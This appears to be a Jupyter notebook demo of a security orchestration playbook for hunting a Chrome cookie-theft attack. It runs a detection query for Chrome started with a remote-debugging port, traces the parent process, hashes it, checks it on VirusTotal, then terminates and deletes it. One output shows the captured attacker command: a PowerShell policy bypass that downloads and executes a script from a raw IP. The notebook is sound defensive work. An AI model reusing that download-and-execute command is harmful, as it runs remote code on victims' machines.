<h1>STR SOAR Demo Playbook<span class="tocSkip"></span></h1>
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc">
    <ul class="toc-item">
        <li>
            <span><a href="#Notebook-Title" data-toc-modified-id="Notebook-Title-1">STR SOAR Demo Playbook</a></span>
            <ul class="toc-item">
                <li>
                    <span><a href="#create-client" data-toc-modified-id="create-client-1.2">Create Securonix Client</a></span>
                </li>
                <li>
                    <span><a href="#init-soar" data-toc-modified-id="create-client-1.2">Initialize SX SOAR microservice connectors</a></span>
                </li>
                <li>
                    <span><a href="#init-omconverter" data-toc-modified-id="create-client-1.2">Convert OMEGA rule to spotter query</a></span>
                </li>
                <li>
                    <span><a href="#run-hunt" data-toc-modified-id="create-client-1.2">Hunt with query</a></span>
                </li>
                <li>
                    <span><a href="#show-process-tree" data-toc-modified-id="create-client-1.2">Build Process Tree Graph  For sessionid's </a></span>
                </li>
                 <li>
                    <span><a href="#ioc-hunting" data-toc-modified-id="IOC-Hunting-1.5">SX SOAR</a></span>
                     <ul class="toc-item">
                        <li>
                            <span><a href="#soar-gethash" data-toc-modified-id="create-client-1.2">Retrieve hash from device by path</a></span>
                        </li>
                        <li>
                            <span><a href="#soar-vt-status" data-toc-modified-id="create-client-1.2">Check hash at VT</a></span>
                        </li>
                        <li>
                            <span><a href="#soar-cs-deletefile" data-toc-modified-id="create-client-1.2">Delete file from device using SX SOAR Microservice</a></span>
                        </li>
                     </ul>
            </ul>
        </li>
    </ul>
</div>

<a id='init'></a>
## Library initialization

In [ ]:
#!python3 -m pip install -r requirements.txt 

In [1]:
from vizr.STRVizr import STRVizr
import pandas as pd
import logging
from IPython.display import HTML
logging.basicConfig(level=logging.ERROR)


import sys,os
sys.path += [
                os.path.abspath('../str-omega'),
]
from omega.converter import STROmegaConverter

pd.set_option('display.max_colwidth', -1)

<a id='create-client'></a>
## Create Securonix Client

In [2]:
client = STRVizr(host="https://****.securonix.net/Snypr", token="****", verify=False)

<a id='init-soar'></a>
## Initialize SX SOAR microservice connectors

In [3]:
from vizr.soar.crowdstrike import Crowdstrike
from vizr.soar.virustotal import VirusTotal

cs = Crowdstrike({
        "microservice_url": "...redacted",
        "client_id": "...redacted",
        "client_secret": "...redacted"
})

vt = VirusTotal({
      "microservice_url": "...redacted",
      "apikey": "...redacted",     
      "server_url": "...redacted"  
})

<a id='init-omconverter'></a>
## Convert OMEGA rule located at /STR-UPS/i1-pass-the-cookie/stratum1 with id DEMO4 to spotter query

In [4]:
omega = STROmegaConverter(
    omega_rules_home =  "./omega", 
    mapping= "./omega/mapping.yml"
)

spotter_query = omega.convertByUUID(
    uuid = "DEMO4"
)
print(spotter_query)

(rg_functionality = "Endpoint Management Systems" AND baseeventid = "1" AND (destinationprocessname ENDS WITH "chrome.exe" AND (resourcecustomfield1 CONTAINS "--user-data-dir" OR resourcecustomfield1 CONTAINS "--remote-debugging-port")) AND (sourceprocessname NOT ENDS WITH "chrome.exe"))


<a id='set-timerange'></a>
### Set time range for hunting

In [5]:
#format %m/%d/%Y %H:%M:%S
time_from = "04/05/2021 11:31:00"
time_to   = "04/05/2021 23:59:59"
timezone = "EST5EDT"

<a id='run-hunt'></a>
## Hunt with query

In [6]:
spotter_query = '''
baseeventid = "1" AND (destinationprocessname ENDS WITH "chrome.exe" AND (resourcecustomfield1 CONTAINS "--user-data-dir" OR resourcecustomfield1 CONTAINS "--remote-debugging-port")) AND sourceprocessname NOT ENDS WITH "chrome.exe"
'''

query = '''
index=activity and 
%s
''' % (spotter_query)

df = await client.search(query, time_from=time_from, time_to=time_to, max=100)
df

processed: 1 requests: 100%|██████████| 1/1 [00:00<00:00,  1.48it/s]


,_indexed_at_tdt,_version_,accountname,accountresourcekey,agentfilename,baseeventid,categorizedtime,categoryseverity,collectionmethod,collectiontimestamp,...,timeline,timeline_by_hour,timeline_by_minute,timeline_by_month,timeline_by_week,transactionstring1,transactionstring2,userid,week,year
0,Mon Apr 05 16:38:00 UTC 2021,1696219194292436992,DEMO-SYSMON,DEMO-SYSMON~demo-sysmon~demo-sysmon~1~-1,1_dest2021040516,1,Evening,0,file,1617640590014,...,1617598800000,1617638400000,1617640500000,1617253200000,1617512400000,Process Monitoring System,Microsoft-Windows-Sysmon,-1,15,2021


In [7]:
df.iloc[0]

_indexed_at_tdt           Mon Apr 05 16:38:00 UTC 2021                                                                                                                                                                                                                                                    
_version_                 1696219194292436992                                                                                                                                                                                                                                                             
accountname               DEMO-SYSMON                                                                                                                                                                                                                                                                     
accountresourcekey        DEMO-SYSMON~demo-sysmon~demo-sysmon~1~-1                                     

## Who spawn chrome  with debugger port?

In [8]:
print("Parent Image: %s" % df.iloc[0]["resourcecustomfield7"])
print("Parent ID: %s" % df.iloc[0]["sourceprocessid"])

Parent Image: C:\temp\p.exe
Parent ID: 1196


## Parent CommandLine is:

In [9]:
print("Parent CommandLine: %s" % df.iloc[0]["resourcecustomfield2"])

Parent CommandLine: p.exe  Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('http://143.198.121.254/ArWsFIfR/cookie.ps1'))


## Device is:

In [10]:
device = df.iloc[0]["sourceusername"].split("\\")[0]
print("device: %s" % device)


device: WIN10-LAPTOP004


## Logon session is:

In [11]:
logon_session = df.iloc[0]["devicecustomstring4"]
print("Logon session: %s" % logon_session)

Logon session: 0xCF86C


<a id='show-process-tree'></a>
## Build Process Tree Graph  For sessionid's 

In [12]:
from pyvis import network as net
import networkx as nx

query = '''
index=activity and 
baseventid=1 AND devicecustomstring4=%s
''' % (logon_session)

# print(query)
# 
process_tree_nodes = await client.search(query, time_from=time_from, time_to=time_to, max=100)
process_tree_nodes['UNIXTIME'] = pd.to_datetime(process_tree_nodes['datetime'], unit='ms')\
    .dt.tz_localize('UTC' )\
    .dt.tz_convert(timezone)

    
G=nx.DiGraph()

def create_graph(row):
    #parent meta
    parent_meta  = "\
        Date: {}<br/>\
        LogonID: {} {}<br/>\
        Path: {}{}<br/>\
        PID: {}<br/>\
        CommandLine: {}<br/>\
        Child: {}</br>\
        GUID: {}</br>\
        Parent GUID: {}\
        ".format(
        row['UNIXTIME'],
        row['sourceusername'], 
        row['devicecustomstring4'], 
        #row['destinationusername'],
        row['oldfilepath'],
        row['sourceprocessname'],
        row['sourceprocessid'],
        row['resourcecustomfield2'],
        row['destinationprocessname'],
        row['deviceexternalid'], #guid
        row['flowsiemid'], #parent guid        
    )
    G.add_node(row['flowsiemid'], color='#30a1a5',size=20, title=parent_meta, label=row['sourceprocessname'],)
    
    #process meta
    process_meta  = "\
        Date: {}<br/>\
        LogonID: {} {}<br/>\
        Path: {}{}<br/>\
        PID: {}<br/>\
        CommandLine: {}<br/>\
        Parent:{}</br>\
        GUID: {}</br>\
        Parent GUID: {}\
        ".format(
        row['UNIXTIME'],
        row['sourceusername'], 
        row['devicecustomstring4'], 
        #row['destinationusername'],
        row['filepath'],
        row['destinationprocessname'],
        row['deviceprocessid'],
        row['resourcecustomfield1'],
        row['sourceprocessname'],
        row['deviceexternalid'], #guid
        row['flowsiemid'], #parent guid        
        
    )
    G.add_node(row['deviceexternalid'], color='#30a1a5',size=20, title=process_meta, label=row['destinationprocessname'])
    G.add_edge(row['flowsiemid'], row['deviceexternalid'], weight=10)
    return 1

process_tree_nodes['OK'] = process_tree_nodes.apply(lambda row: create_graph(row), axis=1)

nt = net.Network("400px", "1500px", heading="Process Tree Graph", notebook=True, directed=True)
nt.from_nx(G)
nt.show("process_tree_graph.html")

processed: 1 requests: 100%|██████████| 1/1 [00:01<00:00,  1.24s/it]


<a id='soar-gethash'></a>
## Let's get hash of this suspicious file "C:\\temp\\p.exe" using SX SOAR microservice 

In [13]:
filepath  = "C:\\temp\\p.exe"
results  = cs.returnFileHashByFilePath(filepath, device)
filehash = results["SHA256"]
print("sha256 hash: %s" % filehash)

sha256 hash: DBD961168786CF454201CCBEF2C7AA7FA72A62A9D353032393CB31C2F8B37D60


<a id='soar-vt-status'></a>
## Check this hash at VT using SX SOAR microservice

In [14]:
report = vt.retrieveScanFileReport(filehash)
print("VT Status: %s" % report[filehash]['status'])


VT Status: 1/58


<a id='soar-cs-terminate'></a>
## Terminate process file from device using SX SOAR Microservice

In [15]:
results  = cs.terminateRunningProcess("p.exe", device)
results

{'Termination Status by ProcessID': {'7512': 'Process killed successfully'},
 'Hostname': 'WIN10-LAPTOP004',
 'Process': 'p.exe'}

<a id='soar-cs-deletefile'></a>
## Delete file from device using SX SOAR Microservice

In [16]:
results  = cs.deleteFileByFileName("p.exe", device)
results

{'Status': 'Deleted'}